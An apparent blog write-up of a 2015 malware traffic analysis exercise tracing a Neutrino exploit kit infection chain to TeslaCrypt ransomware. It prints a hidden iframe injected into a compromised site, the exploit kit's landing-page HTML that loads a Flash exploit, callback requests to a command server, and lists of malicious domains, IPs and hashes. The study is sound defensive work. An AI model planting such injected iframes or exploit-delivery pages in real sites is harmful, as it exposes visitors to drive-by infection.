- \n
- IP address of the Windows computer that was infected.
\n\n 192.168.137.239\n<\/p><\/blockquote>\n<\/li>\n
- MAC address of the Windows computer that was infected.
\n\n 00:02:a5:1c:d4:92\n<\/p><\/blockquote>\n<\/li>\n
- Host name of the Windows computer that was infected.
\n\n Name: GOOGENHEIM-PC\n<\/p><\/blockquote>\n<\/li>\n
- Name of the exploit kit.
\n\n Sweet Orange EK <- This was incorrect as Sweet Orange has not been around for almost a year. This was a\u00a0Neutrino exploit kit.<\/span>\n<\/p><\/blockquote>\n<\/li>\n
- Identification of the payload (for example: Bedep, CryptoWall 3.0, Dyre, Rovnix, Vawtrak, etc).
\n\n Alphacypt <- This was incorrect as this was really TelsaCrypt 2.0 from what Brad has suggested.<\/span>\n<\/p><\/blockquote>\n<\/li>\n
- Identification of the compromised website that kicked off this infection chain.
\n\n http:\/\/vitaminsthatrock.com\/\n<\/p><\/blockquote>\n<\/li>\n
- Any Indicators of compromise (IOCs) from the traffic to include IP addresses and domain names.
\n\n vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390 \/ 46.108.156.181
\n ipinfo.io \/ 54.164.11.220
\n asecproteccion.com \/ 72.55.148.19
\n lk2gaflsgh.jgy658snfyfnvh.com \/ 104.238.174.179
\n tpfnmvg.ioxbpjgtqvwqfzmwhn.ga:35407 \/ 46.108.156.181\n<\/p><\/blockquote>\n<\/li>\n<\/ul>\nNotes about the investigation<\/h3>\n
When we start looking at the PCAP, we can see an odd URL structure as seen below, which seems to be the start of the infection:<\/p>\n
\n GET \/giant\/1171219\/host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft HTTP\/1.1
\n Accept: text\/html, application\/xhtml+xml, \/<\/em>
\n Referer: http:\/\/vitaminsthatrock.com\/
\n Accept-Language: en-US
\n User-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko
\n Accept-Encoding: gzip, deflate
\n Host: vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390
\n DNT: 1
\n Connection: Keep-Alive<\/p>\nHTTP\/1.1 200 OK
\n Server: nginx\/1.4.6 (Ubuntu)
\n Date: Mon, 31 Aug 2015 17:58:25 GMT
\n Content-Type: text\/html
\n Transfer-Encoding: chunked
\n Connection: keep-alive
\n Content-Encoding: gzip<\/p>\n249
\n ……….mSQo.0.~……C IiC….I.Vm..=…Sc.l…..I.n……;..[}.|…~.C………\/..{..
\n o..l7…..h[Sm..FSE..W.p.\\uMH.u~……;).”……..d5…..,.e....ZZ..i...%.fy.z.....0.........>{..x......B.f.GU;..y.....hzJ.dE...P2.g.)Q.}'....ZYk...Wa4[.K.Ji52.W.8.......Iw.9T.{....c....J.<\/code>...…t!<…..y.”…(…9.8.b.I…..%.0.…(jVq.ie(.K.jS
\n …LI.&%.0…. …d@_……E+j..J..ep9.]…..m
\n .una,..
\n ..%.B5@M……….?b.i….Rr..\"......(S..R.....T)...w.#c..S.(S...o
\n ...RM...h......H....7.R).....h.l.'7..R..Su}..iU)......;)..e1.7TI...<\/code>.0.5;’.@.`W7.#..<\/em>..U.> 9. ...……’.t….j..V…….\n<\/p><\/blockquote>\nCapptipper shows that there is a hidden iframe in http:\/\/vitaminsthatrock.com\/ as seen below:<\/p>\n
\n CT> iframes 86
\n Searching for iframes in object 86 (86.html)…
\n 1 iframe(s) Found!<\/p>\n[I] 1 : http:\/\/vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390\/giant\/1171219\/host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft<\/p>\n
<iframe src=”http:\/\/vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390\/giant\/1171219\/host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft” width=”250″ height=”250″><\/iframe>\n<\/p><\/blockquote>\n
The link above directs the end-user\u00a0to a page that hosts the Flash exploit and evidentially the TelsaCrypt 2.0 binary as seen below from the PCAP (the magic number<\/a>\u00a0of “CWS” found in the beginning of the packet data for the Flash file):<\/p>\n
\n CT> info 135
\n Info of conversation 135:
\n SERVER IP : 46.108.156.181:13390
\n TIME : Mon, 08\/31\/15 17:58:19
\n HOST : vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390
\n URI : \/giant\/1171219\/host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft
\n REFERER : http:\/\/vitaminsthatrock.com\/
\n METHOD : GET
\n RESULT NUM : 200 OK
\n RESULT TYPE : text\/html
\n FILE NAME : host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft
\n MAGIC : HyperText Markup Language (HTML)
\n LENGTH : 943 B<\/p>\nCT> head 135
\n Displaying header of object 135 (host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft):
\n HTTP\/1.1 200 OK
\n Server: nginx\/1.4.6 (Ubuntu)
\n Date: Mon, 31 Aug 2015 17:58:25 GMT
\n Content-Type: text\/html
\n Transfer-Encoding: chunked
\n Connection: keep-alive
\n Content-Encoding: gzip<\/p>\nCT> body 135 1000
\n Displaying body of object 135 (host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft) [943 bytes]:<\/p>\n<!DOCTYPE HTML PUBLIC “-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN” “http:\/\/www.w3.org\/TR\/html4\/loose.dtd”>
\n <html>
\n <body>
\n <script>
\n var ucnojasxgkcgrtya = 794340;
\n var cvyldjvqc = 927343;
\n var seigojzlpjnwbgvbb = 41400;
\n var wiparkq = 749213;
\n var nbywimfhyvrlsssnt = 783426;
\n var yllnlc = 938791;
\n <\/script>
\n <object height=”799″ classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ width=”167″ codebase=”http:\/\/fpdownload.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=10,1,52,0″ id=”qvuhndngs”>
\n <param value=”\/defense\/eGxyaGM” name=”movie”\/>
\n <param value=”#ffffff” name=”bgcolor”\/>
\n <param value=”always” name=”allowScriptAccess”\/>
\n <embed name=”qvuhndngs” width=”167″ pluginspage=”http:\/\/www.macromedia.com\/go\/getflashplayer” allowScriptAccess=”sameDomain” height=”799″ type=”application\/x-shockwave-flash” quality=”high” src=”\/defense\/eGxyaGM” > play=”true” loop=”false” align=”middle”\/>
\n <\/object><\/p>\n<\/body>
\n <\/html><\/p>\n#<\/h6>\n
CT> info 136
\n Info of conversation 136:
\n SERVER IP : 46.108.156.181:13390
\n TIME : Mon, 08\/31\/15 17:58:21
\n HOST : vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390
\n URI : \/defense\/eGxyaGM
\n REFERER : http:\/\/vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390\/giant\/1171219\/host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft
\n METHOD : GET
\n RESULT NUM : 200 OK
\n RESULT TYPE : application\/x-shockwave-flash
\n FILE NAME : eGxyaGM
\n MAGIC : Compressed Flash File [ZLIB] (SWF)
\n LENGTH : 75155 B<\/p>\nCT> head 136
\n Displaying header of object 136 (eGxyaGM):
\n HTTP\/1.1 200 OK
\n Server: nginx\/1.4.6 (Ubuntu)
\n Date: Mon, 31 Aug 2015 17:58:27 GMT
\n Content-Type: application\/x-shockwave-flash
\n Transfer-Encoding: chunked
\n Connection: keep-alive<\/p>\nCT> body 136 1000
\n Displaying body of object 136 (eGxyaGM) [1000 bytes]:<\/p>\nCWS9*x???XM?5??m????????!?kpw??;?!?{???.?%?!?s????????S\u04fd?juw??k <etc…><\/p>\n
#<\/h6>\n
CT> info 137
\n Info of conversation 137:
\n SERVER IP : 46.108.156.181:13390
\n TIME : Mon, 08\/31\/15 17:58:23
\n HOST : vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390
\n URI : \/2014\/11\/27\/from\/assemble\/become-open-corp-opportunity-sign-punish-curious-family.html
\n REFERER : http:\/\/vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390\/giant\/1171219\/host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft
\n METHOD : GET
\n RESULT NUM : 200 OK
\n RESULT TYPE : text\/html
\n FILE NAME : become-open-corp-opportunity-sign-punish-curious-family.html
\n MAGIC : GZIP archive file (GZ)
\n LENGTH : 20 B<\/p>\nCT> head 137
\n Displaying header of object 137 (become-open-corp-opportunity-sign-punish-curious-family.html):
\n HTTP\/1.1 200 OK
\n Server: nginx\/1.4.6 (Ubuntu)
\n Date: Mon, 31 Aug 2015 17:58:29 GMT
\n Content-Type: text\/html
\n Transfer-Encoding: chunked
\n Connection: keep-alive
\n Content-Encoding: gzip<\/p>\nCT> body 137 10000
\n Displaying body of object 137 (become-open-corp-opportunity-sign-punish-curious-family.html) [20 bytes]:<\/p>\n?\u00a0<- Odd thing here is that Captipper shows just a question mark for the body of the response. When you look in the actual PCAP you get the following:<\/span>\n<\/p><\/blockquote>\n
![\"Same](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/09\/Wireshark.png\")
<\/a><\/p>\n\n
#<\/h6>\n
CT> info 138
\n Info of conversation 138:
\n SERVER IP : 46.108.156.181:13390
\n TIME : Mon, 08\/31\/15 17:58:24
\n HOST : vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390
\n URI : \/1987\/11\/04\/burn\/each-madness-lucky-american-charm-handle-none.html
\n REFERER :
\n METHOD : GET
\n RESULT NUM : 200 OK
\n RESULT TYPE : application\/octet-stream
\n FILE NAME : each-madness-lucky-american-charm-handle-none.html
\n MAGIC : Inconclusive. Probably binary (BINARY)
\n LENGTH : 314473 B<\/p>\nCT> head 138
\n Displaying header of object 138 (each-madness-lucky-american-charm-handle-none.html):
\n HTTP\/1.1 200 OK
\n Server: nginx\/1.4.6 (Ubuntu)
\n Date: Mon, 31 Aug 2015 17:58:30 GMT
\n Content-Type: application\/octet-stream
\n Content-Length: 314473
\n Connection: keep-alive
\n Last-Modified: Mon, 31 Aug 2015 16:42:44 GMT
\n ETag: “55e48404-4cc69”
\n Accept-Ranges: bytes<\/p>\nCT> body 138 10000
\n Displaying body of object 138 (each-madness-lucky-american-charm-handle-none.html) [10000 bytes]:<\/p>\n??M??
\n 0????pp
\n ?w?:?? ???u?”pv?? <etc…><\/p>\n#<\/h6>\n<\/blockquote>\n
In this case I could open the\u00a0Flash file (eGxyaGM) via 7Zip which reveals the actual SWF file.\u00a0I used two different tools to try to extract anything from the SWF file. The tools I used were SWFTools and JPEXS Free Flash Decompiler. Usually I start off with SWFTools to see what binary files are attached to the SWF file. For example, to get one of the binary files out of the Flash\u00a0file using SWFTools, you use the following syntax:<\/p>\n
\n mine:~ guido$ swfextract \/Users\/guido\/GitHub\/Malware-Excercises\/2015-08-31\\ Traffic\\ Analysis\\ Exercise\/Artifacts\/136-eGxyaGM\\~.swf
\n Objects in file \/Users\/guido\/GitHub\/Malware-Excercises\/2015-08-31 Traffic Analysis Exercise\/Artifacts\/136-eGxyaGM~.swf:
\n [-b] 4 Binarys: ID(s) 1-4
\n [-f] 1 Frame: ID(s) 0
\n mine:~ guido$ swfextract -b 1 \/Users\/guido\/GitHub\/Malware-Excercises\/2015-08-31\\ Traffic\\ Analysis\\ Exercise\/Artifacts\/136-eGxyaGM\\~.swf -o binary1.bin\n<\/p><\/blockquote>\nwhere \u00a0the\u00a0-b<\/em> is the switch for the binary files found, the\u00a01<\/em> is for the first of 4<\/em> binary files found, and -o <out file name><\/em> is the name of the file from the extraction. Unfortunately I was not able to figure out what these binary files were or how they were part of the malware delivery mechanism to the end user. I was also not able to see anything related to these files on VirusTotal (no positive hits at least).<\/p>\n
I then switched gears and used JPEXS to get a different perspective and to see what the ActionScript was doing. Unfortunately I was not able to put the binary and the ActionScript\u00a0together either. I asked Brad about this and if he had any ideas about how to RE the binary files or how to better understand the ActionScript that the Flash file uses, but he was not sure\u00a0either.<\/p>\n
So at this point I know that there is a Flash exploit being used, and based on conversation 138 from Captipper there is a binary file as well (see below). So most likely the Flash file exploits the system because of an out-of-date Flash version (Captipper actually did not show the Flash version in the GET request where as Wireshark did in the TCP stream – x-flash-version: 18,0,0,203<\/em>), and then uses that to pull down the TelsaCrypt 2.0 binary somehow.\u00a0<\/em><\/p>\n
From there we can see that the system makes a call out to a site to get the external IP address of the system as seen below:<\/p>\n
\n GET \/ip HTTP\/1.1
\n User-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident\/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
\n Host: ipinfo.io<\/p>\nHTTP\/1.1 200 OK
\n Access-Control-Allow-Origin: *
\n Content-Type: text\/html; charset=utf-8
\n Date: Mon, 31 Aug 2015 17:58:32 GMT
\n Server: nginx\/1.6.2
\n Content-Length: 14
\n Connection: keep-alive<\/p>\n66.187.73.162\n<\/p><\/blockquote>\n
We can also see that there are some post-infection call-backs as well as seen below:<\/p>\n
\n CT> info 140
\n Info of conversation 140:
\n SERVER IP : 72.55.148.19:80
\n TIME : Mon, 08\/31\/15 17:58:33
\n HOST : asecproteccion.com
\n URI : \/wp-content\/plugins\/useful-banner-manager\/misc.php?D0B1745184D4B19325F8CA239D78E804BD793E372420CA2549A1E52E593467D8A….cont…
\n REFERER :
\n METHOD : GET
\n RESULT NUM : 200 OK
\n RESULT TYPE : text\/html
\n FILE NAME : misc.php
\n MAGIC : Inconclusive. Probably text (TEXT)
\n LENGTH : 25 B<\/p>\nCT> head 140
\n Displaying header of object 140 (misc.php):
\n HTTP\/1.1 200 OK
\n Date: Mon, 31 Aug 2015 17:58:32 GMT
\n Server: Apache\/2.2.31 (Unix) mod_ssl\/2.2.31 OpenSSL\/1.0.1e-fips mod_bwlimited\/1.4
\n X-Powered-By: PHP\/5.3.29
\n Keep-Alive: timeout=5, max=100
\n Connection: Keep-Alive
\n Transfer-Encoding: chunked
\n Content-Type: text\/html<\/p>\nC> T> body 140 1000
\n Displaying body of object 140 (misc.php) [25 bytes]:<\/p>\n—!!!INSERTED!!!—><\/p>\n
1<\/p>\n
#<\/h6>\n
CT> info 141
\n Info of conversation 141:
\n SERVER IP : 72.55.148.19:80
\n TIME : Mon, 08\/31\/15 17:59:15
\n HOST : asecproteccion.com
\n URI : \/wp-content\/plugins\/useful-banner-manager\/misc.php?D3ECA3EC23AA62A397F6CA71219BA2F0A53C602EE2A2E4E3…cont…
\n REFERER :
\n METHOD : GET
\n RESULT NUM : 200 OK
\n RESULT TYPE : text\/html
\n FILE NAME : misc.php
\n MAGIC : Inconclusive. Probably text (TEXT)
\n LENGTH : 25 B<\/p>\nCT> head 141
\n Displaying header of object 141 (misc.php):
\n HTTP\/1.1 200 OK
\n Date: Mon, 31 Aug 2015 17:59:14 GMT
\n Server: Apache\/2.2.31 (Unix) mod_ssl\/2.2.31 OpenSSL\/1.0.1e-fips mod_bwlimited\/1.4
\n X-Powered-By: PHP\/5.3.29
\n Keep-Alive: timeout=5, max=100
\n Connection: Keep-Alive
\n Transfer-Encoding: chunked
\n Content-Type: text\/html<\/p>\nCT> body 141 1000
\n Displaying body of object 141 (misc.php) [25 bytes]:<\/p>\n—!!!INSERTED!!!—
\n 1<\/p>\n#<\/h6>\n
CT> info 142
\n Info of conversation 142:<\/p>\nSERVER IP : 46.108.156.181:35407
\n TIME : Mon, 08\/31\/15 17:59:28
\n HOST : tpfnmvg.ioxbpjgtqvwqfzmwhn.ga:35407
\n URI : \/giant\/1171219\/host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft
\n REFERER : http:\/\/vitaminsthatrock.com\/
\n METHOD : GET
\n RESULT NUM : 404 Not Found
\n RESULT TYPE : text\/html
\n FILE NAME : host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft
\n MAGIC : HyperText Markup Language (HTML)
\n LENGTH : 538 B<\/p>\nCT> head 142
\n Displaying header of object 142 (host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft):
\n HTTP\/1.1 404 Not Found
\n Server: nginx\/1.4.6 (Ubuntu)
\n Date: Mon, 31 Aug 2015 17:59:34 GMT
\n Content-Type: text\/html
\n Transfer-Encoding: chunked
\n Connection: keep-alive
\n Content-Encoding: gzip<\/p>\nCT> body 142 1000
\n Displaying body of object 142 (host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft) [538 bytes]:<\/p>\n<html><head><title>404 Not Found<\/title><\/head><body bgcolor=”white”><center><h1>404 Not Found<\/h1><\/center><hr><center>nginx<\/center><\/body><\/html><!– a padding to disable MSIE and Chrome friendly error page –><!– a > padding to disable MSIE and Chrome friendly error page –><!– a padding to disable MSIE and Chrome friendly error page –><!– a padding to disable MSIE and Chrome friendly error page –><!– a padding to disable MSIE and > Chrome friendly error page –><!– a padding to disable MSIE and Chrome friendly error page —<\/p>\n
#<\/h6>\n<\/blockquote>\n
From there we then see that the final page loads for the decrypting service as seen below:<\/p>\n
\n CT> info 151
\n Info of conversation 151:
\n SERVER IP : 104.238.174.179:80
\n TIME : Mon, 08\/31\/15 18:00:13
\n HOST : lk2gaflsgh.jgy658snfyfnvh.com
\n URI : \/672E4DBC873FBD2A
\n REFERER :
\n METHOD : GET
\n RESULT NUM : 200 OK
\n RESULT TYPE : text\/html
\n FILE NAME : 672E4DBC873FBD2A
\n MAGIC : Inconclusive. Probably text (TEXT)
\n LENGTH : 3132 B<\/p>\nCT> head 151
\n Displaying header of object 151 (672E4DBC873FBD2A):
\n HTTP\/1.1 200 OK
\n Server: nginx\/1.6.2 (Ubuntu)
\n Date: Mon, 31 Aug 2015 18:00:14 GMT
\n Content-Type: text\/html
\n Transfer-Encoding: chunked
\n Connection: keep-alive
\n X-Check-Tor: false
\n X-Powered-By: PHP\/5.5.12-2ubuntu4.4
\n Content-Encoding: gzip
\n Set-Cookie: PHPSESSID=j784i2u51v00ejlajpfmssjua0; path=\/
\n Expires: Thu, 19 Nov 1981 08:52:00 GMT
\n Pragma: no-cache<\/p>\nCT> body 151 1000
\n Displaying body of object 151 (672E4DBC873FBD2A) [1000 bytes]:<\/p>\n<!DOCTYPE html><\/p>\n
<html xmlns=”http:\/\/www.w3.org\/1999\/xhtml”>
\n <head>
\n <title>Decrypt service<\/title>
\n <meta http-equiv=”Content-Type” content=”text\/html; charset=utf-8″\/><\/p>\n#<\/h6>\n<\/blockquote>\n
Hashes and VT Info from this investigation<\/h3>\n
136-eGxyaGM
\nMD5: b02c12f0df9911d16066c0d0f05b28c6
\nVT Link: http:\/\/www.virustotal.com\/file\/a5ef5b9fdae4f9c6edafd1b2ea6a6a67cdee4cee793841917996e3501b8adacc\/analysis\/1441209136\/
\nFirst Submission: 2015-08-31 20:21:44 UTC
\nPositives: 0 \/ 56<\/p>\n136-eGxyaGM~.swf
\nMD5: b914e101d44ccca6d1e7fcb5dee61216
\nVT Link: http:\/\/www.virustotal.com\/file\/5e518aaac1991e5efe72c0b3a67dec159bf3f28ff338359a1b605b5b0f1807a6\/analysis\/1441408039\/
\nFirst Submission: 2015-09-04 23:07:19 UTC
\nPositives: 1 \/ 56<\/p>\n138-each-madness-lucky-american-charm-handle-none.exe
\nMD5: 869e7a996f1b65d28f8589af81b85fe6
\nVT Link: http:\/\/www.virustotal.com\/file\/387d6f4670bfd929e4b91fc715cb03c86ddf926dc9c39d783181467224b6edf9\/analysis\/1441163547\/
\nFirst submission 2015-08-31 20:49:39 UTC
\nPositives: 0 \/ 56<\/p>\n - MAC address of the Windows computer that was infected.